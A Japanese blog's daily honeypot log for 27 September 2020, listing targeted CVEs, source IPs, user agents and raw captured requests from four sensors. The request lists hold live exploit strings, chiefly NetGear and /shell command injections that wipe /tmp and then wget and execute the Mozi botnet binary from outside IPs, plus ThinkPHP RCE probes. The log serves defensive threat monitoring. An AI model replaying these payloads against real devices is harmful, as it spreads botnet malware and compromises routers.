コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2020/09/27 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2020/09/27分です。

特徴
Location:JP

GPONルータの脆弱性(CVE-2018-10561)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
Oracle WebLogic脆弱性(CVE-2019-2725)を狙うアクセス
zgrabによるスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。

Location:US

Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
internetwache.orgによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。

Location:UK

Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス NetGear製品の脆弱性を狙うアクセス PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス ThinkPHPの脆弱性を狙うアクセス zgrabによるスキャン行為 ZmEuによるスキャン行為 Apache Solrへのスキャン行為 phpMyAdminへのスキャン行為 を確認しました。

Location:SG

GPONルータの脆弱性(CVE-2018-10561)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
112[.]124[.]42[.]80に関する不正通信
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

アクセス数推移

JP:総アクセス数:238 (前日比:+179)
US:総アクセス数:189 (前日比:+141)
UK:総アクセス数:47 (前日比:-104)
SG:総アクセス数:24 (前日比:-36)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 1.246.222.4 South Korea
1 27.194.34.1 China
1 27.215.5.157 China
1 39.79.33.130 China
1 42.238.202.120 China
2 45.148.10.28 Italy
2 51.137.159.226 United Kingdom
1 52.231.159.68 United States
1 61.219.11.153 Taiwan
1 65.52.207.171 United States
4 82.221.105.6 Iceland
2 87.251.75.254 Russia
1 94.102.51.119 Netherlands
1 95.142.118.27 Czechia
2 111.231.69.73 China
101 114.226.161.111 China
1 115.98.190.98 India
2 176.113.115.214 Russia
5 185.128.41.50 Switzerland
1 192.241.219.38 United States
1 199.195.254.38 United States
1 202.83.42.183 India
1 202.83.42.199 India
1 221.13.220.164 China
101 223.13.178.94 China
1 223.155.42.86 China

UserAgent一覧

件数 UserAgent
16 -
3 Hello, World
4 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
202 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
2 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
3 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
2 -
2 \x03
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
1 GET ../../proc/ HTTP
2 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /_async/AsyncResponseService HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
1 GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
2 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
202 GET /phpmyadmin/ HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//39[.]79[.]33[.]130:45553/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /sitemap.xml HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 HEAD / HTTP/1.0
3 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /app HTTP/1.1
4 POST /invoker/readonly HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
2 45.148.10.28 Italy
2 49.82.236.115 China
1 61.219.11.153 Taiwan
1 94.102.51.119 Netherlands
2 104.244.73.193 United States
10 111.229.112.156 China
13 176.113.115.214 Russia
1 185.163.110.124 Romania
1 185.220.100.246 Germany
1 192.241.237.188 United States
1 199.195.254.38 United States
154 208.91.110.34 United States

UserAgent一覧

件数 UserAgent
4 -
4 Go-http-client/1.1
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
13 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
154 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 zgrab/0.x
1 internetwache.org v3.4

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 GET ../../proc/ HTTP
1 GET /.env HTTP/1.1
2 GET /.git/config HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
3 GET /Account/ HTTP/1.1
3 GET /Line/ HTTP/1.1
3 GET /Lines/ HTTP/1.1
3 GET /SPA112/ HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
3 GET /Telephone/ HTTP/1.1
3 GET /aastra/ HTTP/1.1
3 GET /ab/tftpboot/ HTTP/1.1
3 GET /asterisk/ HTTP/1.1
3 GET /ata/ HTTP/1.1
3 GET /backup/ HTTP/1.1
3 GET /backups/ HTTP/1.1
2 GET /bkp/ HTTP/1.1
3 GET /cfg/ HTTP/1.1
3 GET /cisco/ HTTP/1.1
3 GET /conf/ HTTP/1.1
3 GET /config/ HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
3 GET /configs/ HTTP/1.1
3 GET /digium/ HTTP/1.1
1 GET /elrekt.php HTTP/1.1
3 GET /etc/ HTTP/1.1
3 GET /etc/asterisk/ HTTP/1.1
2 GET /etc/asterisk/extensions.conf/ HTTP/1.1
3 GET /etc/sip.txt/ HTTP/1.1
3 GET /etc/sip/ HTTP/1.1
3 GET /gateway/ HTTP/1.1
3 GET /grandstream/ HTTP/1.1
3 GET /gravacoes/ HTTP/1.1
3 GET /gs/ HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
6 GET /linksys/ HTTP/1.1
3 GET /mitel/ HTTP/1.1
3 GET /phones/ HTTP/1.1
1 GET /phpmyadmin/ HTTP/1.1
3 GET /polycom/ HTTP/1.1
3 GET /prov/ HTTP/1.1
3 GET /prov_l/ HTTP/1.1
3 GET /provision/ HTTP/1.1
3 GET /provisioning/ HTTP/1.1
1 GET /public/index.php HTTP/1.1
3 GET /sip.txt/ HTTP/1.1
3 GET /sip/ HTTP/1.1
3 GET /sipura/ HTTP/1.1
3 GET /snom/ HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
3 GET /spa/ HTTP/1.1
3 GET /ssl/ HTTP/1.1
3 GET /tftp/ HTTP/1.1
3 GET /tftpboot/ HTTP/1.1
3 GET /tftpphone/ HTTP/1.1
3 GET /tftproot/ HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
3 GET /txt/ HTTP/1.1
1 GET /v2/_catalog HTTP/1.1
3 GET /var/ HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
3 GET /voip/ HTTP/1.1
3 GET /xml/ HTTP/1.1
3 GET /yealink/ HTTP/1.1
3 GET /yeastar/ HTTP/1.1
1 HEAD / HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 consumed: 2926
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 27.194.158.180 China
2 45.148.10.28 Italy
1 52.183.102.134 United States
1 62.4.16.114 France
1 83.97.20.46 Romania
26 89.248.174.11 Netherlands
1 94.102.51.119 Netherlands
1 113.247.129.114 China
1 115.49.214.154 China
9 176.113.115.214 Russia
1 192.241.239.116 United States
1 199.195.254.38 United States
1 221.3.33.40 China

UserAgent一覧

件数 UserAgent
6 -
9 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 zgrab/0.x
26 ZmEu
1 curl/7.29.0

リクエスト内容一覧

件数 Method Request Protocol
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
1 GET ../../proc/ HTTP
2 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /MyAdmin/scripts/setup.php HTTP/1.1
1 GET /PHPMYADMIN/scripts/setup.php HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /database/scripts/setup.php HTTP/1.1
1 GET /db/scripts/setup.php HTTP/1.1
1 GET /dbadmin/scripts/setup.php HTTP/1.1
1 GET /hudson HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
1 GET /my/scripts/setup.php HTTP/1.1
1 GET /myadmin/scripts/setup.php HTTP/1.1
1 GET /mysql/scripts/setup.php HTTP/1.1
1 GET /mysqladmin/scripts/setup.php HTTP/1.1
1 GET /pHpMyAdMiN/scripts/setup.php HTTP/1.1
1 GET /phpAdmin/scripts/setup.php HTTP/1.1
1 GET /phpMyAdmin-2/scripts/setup.php HTTP/1.1
1 GET /phpMyAdmin/scripts/db.init.php HTTP/1.1
1 GET /phpMyAdmin/scripts/setup.php HTTP/1.1
1 GET /phpadmin/scripts/setup.php HTTP/1.1
1 GET /phpmyadmin/scripts/db.init.php HTTP/1.1
1 GET /phpmyadmin/scripts/setup.php HTTP/1.1
1 GET /phpmyadmin1/scripts/setup.php HTTP/1.1
1 GET /phpmyadmin2/scripts/setup.php HTTP/1.1
1 GET /pma/scripts/setup.php HTTP/1.1
1 GET /scripts/setup.php HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//115[.]49[.]214[.]154:46161/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//221[.]3[.]33[.]40:36906/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.php HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /sqladm/scripts/setup.php HTTP/1.1
1 GET /sqladmin/scripts/setup.php HTTP/1.1
1 GET /telephony-service.html HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1
1 HEAD / HTTP/1.0
1 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 27.193.250.240 China
2 45.148.10.28 Italy
1 60.191.125.35 China
1 66.240.205.34 United States
1 94.102.51.119 Netherlands
1 112.27.124.118 China
1 124.131.124.33 China
1 159.18.94.65 Canada
7 176.113.115.214 Russia
1 182.119.210.221 China
4 185.142.236.34 Netherlands
1 192.241.236.125 United States
1 202.83.37.77 India
1 202.83.42.13 India

UserAgent一覧

件数 UserAgent
9 -
2 Hello, World
1 Hello, world
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
7 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
1 Gh0st\xad
1 GET /.well-known/security.txt HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//182[.]119[.]210[.]221:38673/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//202[.]83[.]37[.]77:51111/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 HEAD / HTTP/1.0
1 HEAD http[:]//112[.]124[.]42[.]80:63435/ HTTP/1.1
1 OPTIONS * HTTP/1.1
2 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1